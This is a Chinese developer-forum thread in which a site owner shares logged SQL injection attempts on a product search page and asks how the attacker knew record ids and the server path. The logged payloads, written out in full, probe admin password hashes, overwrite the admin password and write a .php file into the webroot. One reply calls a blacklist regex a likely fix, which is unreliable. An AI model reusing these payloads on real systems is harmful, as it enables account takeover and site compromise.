sql注入问题

啾啾我 2016-03-19 09:30:44 


错误URL地址 : /product/default.aspx

错误时间 : 2016-03-18 22:11:53

错误:鸡缸杯%'and (select count(*) from admin where id=3 and password='268C0C9BC21B1207A84F553B11E372E8')=1 and '%'='



**************************************************************************************

错误URL地址 : /product/default.aspx

错误时间 : 2016-03-18 22:12:00

错误:鸡缸杯%'and (select count(*) from admin where id=3 and password='168C0C9BC21B1207A84F553B11E372E8')=1 and '%'='



**************************************************************************************

错误URL地址 : /product/default.aspx

错误时间 : 2016-03-18 22:12:24

错误:鸡缸杯%'and (select count(*) from admin where id=120 and password='B3E1B96D0A042ED33AE27D54C68C8FC4')=1 and '%'='



**************************************************************************************

错误URL地址 : /view/default.aspx

错误时间 : 2016-03-18 22:12:59

错误:鸡缸杯%'; update admin set password='268C0C9BC21B1207A84F553B11E372E8' where id=120;--



**************************************************************************************

错误URL地址 : /product/default.aspx

错误时间 : 2016-03-18 22:13:43

错误:鸡缸杯%'; update admin set password='B3E1B96D0A042ED33AE27D54C68C8FC4' where id=120;--



**************************************************************************************



错误URL地址 : /product/default.aspx

错误时间 : 2016-03-18 22:13:52

错误:鸡缸杯%'and (select count(*) from admin where id=120 and password='B3E1B96D0A042ED33AE27D54C68C8FC4')=1 and '%'='



**************************************************************************************

错误URL地址 : /product/default.aspx

错误时间 : 2016-03-18 22:19:42

错误:鸡缸杯%'; select 'aaa' into outfile 'd:\wwwroot\web\test.php';--



**************************************************************************************


这个是我前几天通过错误日志记录的用户输入的信息,当然我后台有一个正则过滤一些特殊字符


if (Regex.IsMatch(value, @"[|;|\.|,|\/||||\}|\{|%|@|\*|!|\']"))

他这些sql注入都是通过一个网页产品搜索功能尝试的。例如product/?value='输入的查询字符串' 后台直接验证like%查询

我想不明白的是他怎么知道我的数据库中id有120,3的数据,还有他怎么知道我的虚拟路径d:\wwwroot\web\这个的,是自己尝试的还是通过其他方式获得的。
...全文
177 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
中国风 2016-03-19
  • 打赏
  • 举报
 回复
SQL注入专题--整理帖 http://bbs.csdn.net/topics/290032853
啾啾我 2016-03-19
  • 打赏
  • 举报
 回复
引用 3 楼 ap0405140 的回复:
应该可以.
我想不明白的是他怎么知道我的数据库中id有120,3的数据,还有他怎么知道我的虚拟路径d:\wwwroot\web\这个的,是自己尝试的还是通过其他方式获得的。
唐诗三百首 2016-03-19
  • 打赏
  • 举报
 回复
引用 2 楼 sossos555 的回复:
我后台使用正则过滤掉一些字符能够解决这问题吗?我的查询不是拼接的sql,都是是参数化查询
应该可以.
啾啾我 2016-03-19
  • 打赏
  • 举报
 回复
引用 1 楼 ap0405140 的回复:
建议把SQL封装为存储过程,前端程序调用存储过程输入参数即可.
我后台使用正则过滤掉一些字符能够解决这问题吗?我的查询不是拼接的sql,都是是参数化查询
唐诗三百首 2016-03-19
  • 打赏
  • 举报
 回复
建议把SQL封装为存储过程,前端程序调用存储过程输入参数即可.
SQL注入漏洞演示源代码
SQL注入漏洞演示源代码 更多免费资源请查看:http://download.csdn.net/user/php_fly
小榕sql注入工具
WED.EXE 小榕(榕哥)出的sql注入工具 使用该工具可以在短短2秒钟就猜出管理员的帐号和密码! 里面附带的wis.exe 也是小榕写的一个扫描后台管理员登陆路径的工具!
JAVA代码审计之SQL注入
本章节课程主要从以下三方面详细的介绍了如何针对java代码中sql注入的审计方法及黑盒验证: 1、JDBC连接方式下sql注入的存在的形态及修复方法,like、in情况在如何安全使用预处理来防范sql注入 2、在使用Mybatis框架...
小榕SQL注入-wis,wed工具包
大名鼎鼎的SQL注入工具包,有兴趣的朋友可以下载对网站的sql漏洞进行扫描测试,反对对网站进行攻击。
MyBatis-sql注入问题
MyBatis sql注入问题 1、什么是SQL注入? ​ SQL注入攻击,简称SQL攻击或注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 最常见的就是我们在应用程序中使用字符串联结方式组合 SQL 指令,有心之人就会写一些特殊的符号,恶意篡改原本的 SQL 语法的作用,达到注入攻击的目的。 举个栗子: 比如验证用户登录需要 user
community_281

590

社区成员

254,050

社区内容

发帖
与我相关
我的任务
社区描述
提出问题
其他 技术论坛(原bbs)
社区管理员
  • community_281
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章